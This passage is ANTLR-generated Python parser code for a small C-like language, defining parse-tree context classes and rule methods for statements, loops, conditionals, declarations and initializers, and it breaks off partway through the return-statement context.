    """Parse-tree node produced by the 'statement' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_statement

    # One accessor per possible child kind; at most one is non-None per node.
    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext, 0)

    def ifCond(self):
        return self.getTypedRuleContext(SmallCParser.IfCondContext, 0)

    def whileCond(self):
        return self.getTypedRuleContext(SmallCParser.WhileCondContext, 0)

    def doWhileCond(self):
        return self.getTypedRuleContext(SmallCParser.DoWhileCondContext, 0)

    def forLoop(self):
        return self.getTypedRuleContext(SmallCParser.ForLoopContext, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def variableDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext, 0)

    def returnStmt(self):
        return self.getTypedRuleContext(SmallCParser.ReturnStmtContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterStatement"):
            listener.enterStatement(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitStatement"):
            listener.exitStatement(self)
def statement(self):
    """Parse the 'statement' rule, dispatching on the lookahead token."""

    localctx = SmallCParser.StatementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 52, self.RULE_statement)
    try:
        self.state = 387
        # LL(1) dispatch: the first token decides which statement form follows.
        token = self._input.LA(1)
        if token in [SmallCParser.LCBRA]:
            self.enterOuterAlt(localctx, 1)
            self.state = 372
            self.statements()
        elif token in [SmallCParser.IF]:
            self.enterOuterAlt(localctx, 2)
            self.state = 373
            self.ifCond()
        elif token in [SmallCParser.WHILE]:
            self.enterOuterAlt(localctx, 3)
            self.state = 374
            self.whileCond()
        elif token in [SmallCParser.DO]:
            self.enterOuterAlt(localctx, 4)
            self.state = 375
            self.doWhileCond()
        elif token in [SmallCParser.FOR]:
            self.enterOuterAlt(localctx, 5)
            self.state = 376
            self.forLoop()
        elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Expression statement, terminated by T__18 (statement terminator token).
            self.enterOuterAlt(localctx, 6)
            self.state = 377
            self.expression()
            self.state = 378
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
            self.enterOuterAlt(localctx, 7)
            self.state = 380
            self.variableDeclaration()
            self.state = 381
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.RETURN]:
            self.enterOuterAlt(localctx, 8)
            self.state = 383
            self.returnStmt()
            self.state = 384
            self.match(SmallCParser.T__18)
        elif token in [SmallCParser.T__18]:
            # Empty statement: just the terminator.
            self.enterOuterAlt(localctx, 9)
            self.state = 386
            self.match(SmallCParser.T__18)
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ExpressionContext(ParserRuleContext):
    """Parse-tree node produced by the 'expression' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_expression

    # One accessor per expression alternative; at most one is non-None per node.
    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext, 0)

    def floatLiteral(self):
        return self.getTypedRuleContext(SmallCParser.FloatLiteralContext, 0)

    def integerLiteral(self):
        return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext, 0)

    def characterLiteral(self):
        return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext, 0)

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext, 0)

    def functionCall(self):
        return self.getTypedRuleContext(SmallCParser.FunctionCallContext, 0)

    def oplevel14(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterExpression"):
            listener.enterExpression(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitExpression"):
            listener.exitExpression(self)
def expression(self):
    """Parse the 'expression' rule; alternative chosen by ATN prediction."""

    localctx = SmallCParser.ExpressionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 54, self.RULE_expression)
    try:
        self.state = 396
        self._errHandler.sync(self);
        # Adaptive prediction (decision 33) resolves which expression form follows.
        la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 389
            self.variable()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 390
            self.floatLiteral()
            pass
        elif la_ == 3:
            self.enterOuterAlt(localctx, 3)
            self.state = 391
            self.integerLiteral()
            pass
        elif la_ == 4:
            self.enterOuterAlt(localctx, 4)
            self.state = 392
            self.characterLiteral()
            pass
        elif la_ == 5:
            self.enterOuterAlt(localctx, 5)
            self.state = 393
            self.stringLiteral()
            pass
        elif la_ == 6:
            self.enterOuterAlt(localctx, 6)
            self.state = 394
            self.functionCall()
            pass
        elif la_ == 7:
            self.enterOuterAlt(localctx, 7)
            self.state = 395
            self.oplevel14()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IfCondContext(ParserRuleContext):
    """Parse-tree node produced by the 'ifCond' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_ifCond

    def IF(self):
        return self.getToken(SmallCParser.IF, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext, 0)

    def elseCond(self):
        # None when the 'if' has no 'else' branch.
        return self.getTypedRuleContext(SmallCParser.ElseCondContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterIfCond"):
            listener.enterIfCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitIfCond"):
            listener.exitIfCond(self)
def ifCond(self):
    """Parse the 'ifCond' rule: IF '(' expression ')' statement, optional elseCond."""

    localctx = SmallCParser.IfCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 56, self.RULE_ifCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 398
        self.match(SmallCParser.IF)
        self.state = 399
        self.match(SmallCParser.LBRA)
        self.state = 400
        self.expression()
        self.state = 401
        self.match(SmallCParser.RBRA)
        self.state = 402
        self.statement()
        self.state = 404
        self._errHandler.sync(self);
        # Adaptive prediction (decision 34) decides whether an else branch follows.
        la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
        if la_ == 1:
            self.state = 403
            self.elseCond()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ElseCondContext(ParserRuleContext):
    """Parse-tree node produced by the 'elseCond' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_elseCond

    def ELSE(self):
        return self.getToken(SmallCParser.ELSE, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterElseCond"):
            listener.enterElseCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitElseCond"):
            listener.exitElseCond(self)
def elseCond(self):
    """Parse the 'elseCond' rule: ELSE followed by a statement."""

    localctx = SmallCParser.ElseCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 58, self.RULE_elseCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 406
        self.match(SmallCParser.ELSE)
        self.state = 407
        self.statement()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class WhileCondContext(ParserRuleContext):
    """Parse-tree node produced by the 'whileCond' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_whileCond

    def WHILE(self):
        return self.getToken(SmallCParser.WHILE, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterWhileCond"):
            listener.enterWhileCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitWhileCond"):
            listener.exitWhileCond(self)
def whileCond(self):
    """Parse the 'whileCond' rule: WHILE '(' expression ')' statement."""

    localctx = SmallCParser.WhileCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 60, self.RULE_whileCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 409
        self.match(SmallCParser.WHILE)
        self.state = 410
        self.match(SmallCParser.LBRA)
        self.state = 411
        self.expression()
        self.state = 412
        self.match(SmallCParser.RBRA)
        self.state = 413
        self.statement()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DoWhileCondContext(ParserRuleContext):
    """Parse-tree node produced by the 'doWhileCond' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_doWhileCond

    def DO(self):
        return self.getToken(SmallCParser.DO, 0)

    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext, 0)

    def WHILE(self):
        return self.getToken(SmallCParser.WHILE, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterDoWhileCond"):
            listener.enterDoWhileCond(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitDoWhileCond"):
            listener.exitDoWhileCond(self)
def doWhileCond(self):
    """Parse the 'doWhileCond' rule: DO statements WHILE '(' expression ')' terminator."""

    localctx = SmallCParser.DoWhileCondContext(self, self._ctx, self.state)
    self.enterRule(localctx, 62, self.RULE_doWhileCond)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 415
        self.match(SmallCParser.DO)
        self.state = 416
        self.statements()
        self.state = 417
        self.match(SmallCParser.WHILE)
        self.state = 418
        self.match(SmallCParser.LBRA)
        self.state = 419
        self.expression()
        self.state = 420
        self.match(SmallCParser.RBRA)
        self.state = 421
        # T__18 is the statement-terminator token.
        self.match(SmallCParser.T__18)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ForLoopContext(ParserRuleContext):
    """Parse-tree node produced by the 'forLoop' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_forLoop

    def FOR(self):
        return self.getToken(SmallCParser.FOR, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def expression(self, i:int=None):
        # No index: return both header expressions; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, i)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statement(self):
        return self.getTypedRuleContext(SmallCParser.StatementContext, 0)

    def variableDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext, 0)

    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterForLoop"):
            listener.enterForLoop(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitForLoop"):
            listener.exitForLoop(self)
def forLoop(self):
    """Parse the 'forLoop' rule: FOR '(' init ; expression ; expression ')' statement."""

    localctx = SmallCParser.ForLoopContext(self, self._ctx, self.state)
    self.enterRule(localctx, 64, self.RULE_forLoop)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 423
        self.match(SmallCParser.FOR)
        self.state = 424
        self.match(SmallCParser.LBRA)
        self.state = 427
        # The init clause is either a declaration (starts with a type/const
        # keyword) or a plain variable (starts with IDENTIFIER).
        token = self._input.LA(1)
        if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
            self.state = 425
            self.variableDeclaration()
        elif token in [SmallCParser.IDENTIFIER]:
            self.state = 426
            self.variable()
        else:
            raise NoViableAltException(self)
        self.state = 429
        self.match(SmallCParser.T__18)
        self.state = 430
        self.expression()
        self.state = 431
        self.match(SmallCParser.T__18)
        self.state = 432
        self.expression()
        self.state = 433
        self.match(SmallCParser.RBRA)
        self.state = 434
        self.statement()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class VariableDeclarationContext(ParserRuleContext):
    """Parse-tree node produced by the 'variableDeclaration' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_variableDeclaration

    def declaratorInitializer(self, i:int=None):
        # No index: return all declaratorInitializer children; otherwise the i-th.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclaratorInitializerContext)
        return self.getTypedRuleContext(SmallCParser.DeclaratorInitializerContext, i)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext, i)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterVariableDeclaration"):
            listener.enterVariableDeclaration(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitVariableDeclaration"):
            listener.exitVariableDeclaration(self)
def variableDeclaration(self):
    """Parse the 'variableDeclaration' rule: specifiers, then comma-separated declarators."""

    localctx = SmallCParser.VariableDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 66, self.RULE_variableDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 437
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One or more declaration specifiers (type keywords / const).
        while True:
            self.state = 436
            self.declarationSpecifier()
            self.state = 439
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Bitmask test: keep looping while the lookahead is a specifier token.
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 441
        self.declaratorInitializer()
        self.state = 446
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Additional declarators are comma-separated.
        while _la==SmallCParser.COMMA:
            self.state = 442
            self.match(SmallCParser.COMMA)
            self.state = 443
            self.declaratorInitializer()
            self.state = 448
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DeclarationSpecifierContext(ParserRuleContext):
    """Parse-tree node produced by the 'declarationSpecifier' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_declarationSpecifier

    def typeDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext, 0)

    def cvQualifier(self):
        return self.getTypedRuleContext(SmallCParser.CvQualifierContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterDeclarationSpecifier"):
            listener.enterDeclarationSpecifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitDeclarationSpecifier"):
            listener.exitDeclarationSpecifier(self)
def declarationSpecifier(self):
    """Parse the 'declarationSpecifier' rule: a type declaration or a cv-qualifier."""

    localctx = SmallCParser.DeclarationSpecifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 68, self.RULE_declarationSpecifier)
    try:
        self.state = 451
        # LL(1) dispatch on the lookahead token.
        token = self._input.LA(1)
        if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID]:
            self.enterOuterAlt(localctx, 1)
            self.state = 449
            self.typeDeclaration()
        elif token in [SmallCParser.CONST]:
            self.enterOuterAlt(localctx, 2)
            self.state = 450
            self.cvQualifier()
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class CvQualifierContext(ParserRuleContext):
    """Parse-tree node produced by the 'cvQualifier' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_cvQualifier

    def CONST(self):
        return self.getToken(SmallCParser.CONST, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterCvQualifier"):
            listener.enterCvQualifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitCvQualifier"):
            listener.exitCvQualifier(self)
def cvQualifier(self):
    """Parse the 'cvQualifier' rule: the single CONST token."""

    localctx = SmallCParser.CvQualifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 70, self.RULE_cvQualifier)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 453
        self.match(SmallCParser.CONST)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DeclaratorInitializerContext(ParserRuleContext):
    """Parse-tree node produced by the 'declaratorInitializer' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_declaratorInitializer

    def declarator1(self):
        return self.getTypedRuleContext(SmallCParser.Declarator1Context, 0)

    def initializer(self):
        # None when the declarator has no initializer.
        return self.getTypedRuleContext(SmallCParser.InitializerContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterDeclaratorInitializer"):
            listener.enterDeclaratorInitializer(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitDeclaratorInitializer"):
            listener.exitDeclaratorInitializer(self)
def declaratorInitializer(self):
    """Parse the 'declaratorInitializer' rule: a declarator with an optional '=' initializer."""

    localctx = SmallCParser.DeclaratorInitializerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 72, self.RULE_declaratorInitializer)
    self._la = 0 # Token type
    try:
        self.state = 467
        self._errHandler.sync(self);
        # Adaptive prediction (decision 41) chooses parenthesized vs bare declarator.
        la_ = self._interp.adaptivePredict(self._input,41,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 455
            self.match(SmallCParser.LBRA)
            self.state = 456
            self.declarator1()
            self.state = 457
            self.match(SmallCParser.RBRA)
            self.state = 460
            _la = self._input.LA(1)
            # Optional initializer introduced by T__0 (the '=' token).
            if _la==SmallCParser.T__0:
                self.state = 458
                self.match(SmallCParser.T__0)
                self.state = 459
                self.initializer()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 462
            self.declarator1()
            self.state = 465
            _la = self._input.LA(1)
            if _la==SmallCParser.T__0:
                self.state = 463
                self.match(SmallCParser.T__0)
                self.state = 464
                self.initializer()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Declarator1Context(ParserRuleContext):
    """Parse-tree node produced by the 'declarator1' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_declarator1

    def declarator1(self):
        return self.getTypedRuleContext(SmallCParser.Declarator1Context, 0)

    def declarator2(self):
        return self.getTypedRuleContext(SmallCParser.Declarator2Context, 0)

    def arrayPart(self):
        # None when the declarator has no array suffix.
        return self.getTypedRuleContext(SmallCParser.ArrayPartContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterDeclarator1"):
            listener.enterDeclarator1(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitDeclarator1"):
            listener.exitDeclarator1(self)
def declarator1(self):
    """Parse the 'declarator1' rule: parenthesized declarator, or declarator2 with optional array part."""

    localctx = SmallCParser.Declarator1Context(self, self._ctx, self.state)
    self.enterRule(localctx, 74, self.RULE_declarator1)
    try:
        self.state = 477
        self._errHandler.sync(self);
        # Adaptive prediction (decision 43) selects the alternative.
        la_ = self._interp.adaptivePredict(self._input,43,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 469
            self.match(SmallCParser.LBRA)
            self.state = 470
            self.declarator1()
            self.state = 471
            self.match(SmallCParser.RBRA)
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 473
            self.declarator2()
            self.state = 475
            self._errHandler.sync(self);
            # Decision 42: does an array suffix follow?
            la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
            if la_ == 1:
                self.state = 474
                self.arrayPart()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Declarator2Context(ParserRuleContext):
    """Parse-tree node produced by the 'declarator2' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_declarator2

    def declarator2(self):
        return self.getTypedRuleContext(SmallCParser.Declarator2Context, 0)

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, 0)

    def pointerPart(self, i:int=None):
        # No index: return all pointerPart children; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        return self.getTypedRuleContext(SmallCParser.PointerPartContext, i)

    def declarator1(self):
        return self.getTypedRuleContext(SmallCParser.Declarator1Context, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterDeclarator2"):
            listener.enterDeclarator2(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitDeclarator2"):
            listener.exitDeclarator2(self)
def declarator2(self):
    """Parse the 'declarator2' rule: parenthesized declarator2, pointers+identifier, or pointers+declarator1."""

    localctx = SmallCParser.Declarator2Context(self, self._ctx, self.state)
    self.enterRule(localctx, 76, self.RULE_declarator2)
    self._la = 0 # Token type
    try:
        self.state = 497
        self._errHandler.sync(self);
        # Adaptive prediction (decision 46) selects the alternative.
        la_ = self._interp.adaptivePredict(self._input,46,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 479
            self.match(SmallCParser.LBRA)
            self.state = 480
            self.declarator2()
            self.state = 481
            self.match(SmallCParser.RBRA)
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 486
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Zero or more pointer parts before the identifier.
            while _la==SmallCParser.T__11:
                self.state = 483
                self.pointerPart()
                self.state = 488
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            self.state = 489
            self.identifier()
            pass
        elif la_ == 3:
            self.enterOuterAlt(localctx, 3)
            self.state = 491
            self._errHandler.sync(self)
            # One-or-more loop driven by adaptive prediction (decision 45):
            # _alt stays 1 while another pointerPart should be consumed.
            _alt = 1
            while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
                if _alt == 1:
                    self.state = 490
                    self.pointerPart()
                else:
                    raise NoViableAltException(self)
                self.state = 493
                self._errHandler.sync(self)
                _alt = self._interp.adaptivePredict(self._input,45,self._ctx)
            self.state = 495
            self.declarator1()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class InitializerContext(ParserRuleContext):
    """Parse-tree node produced by the 'initializer' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_initializer

    def LCBRA(self):
        return self.getToken(SmallCParser.LCBRA, 0)

    def RCBRA(self):
        return self.getToken(SmallCParser.RCBRA, 0)

    def expression(self, i:int=None):
        # No index: return every expression child; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, i)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterInitializer"):
            listener.enterInitializer(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitInitializer"):
            listener.exitInitializer(self)
def initializer(self):
    """Parse `initializer`: '{' (expression (',' expression)*)? '}' | expression.

    ANTLR-generated; `self.state` values index the serialized ATN — do not hand-edit.
    """
    localctx = SmallCParser.InitializerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 78, self.RULE_initializer)
    self._la = 0 # Token type
    try:
        self.state = 512
        token = self._input.LA(1)
        if token in [SmallCParser.LCBRA]:
            # Alt 1: brace-enclosed, comma-separated initializer list.
            self.enterOuterAlt(localctx, 1)
            self.state = 499
            self.match(SmallCParser.LCBRA)
            self.state = 508
            _la = self._input.LA(1)
            # Bit-set membership test: lookahead in FIRST(expression)?
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
                self.state = 500
                self.expression()
                self.state = 505
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                while _la==SmallCParser.COMMA:
                    self.state = 501
                    self.match(SmallCParser.COMMA)
                    self.state = 502
                    self.expression()
                    self.state = 507
                    self._errHandler.sync(self)
                    _la = self._input.LA(1)
            self.state = 510
            self.match(SmallCParser.RCBRA)
        elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Alt 2: a bare expression initializer.
            self.enterOuterAlt(localctx, 2)
            self.state = 511
            self.expression()
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ReturnStmtContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `returnStmt` grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def RETURN(self):
        return self.getToken(SmallCParser.RETURN, 0)

    def expression(self):
        # Optional return value; None when the statement had no expression.
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_returnStmt

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterReturnStmt" ):
            listener.enterReturnStmt(self)

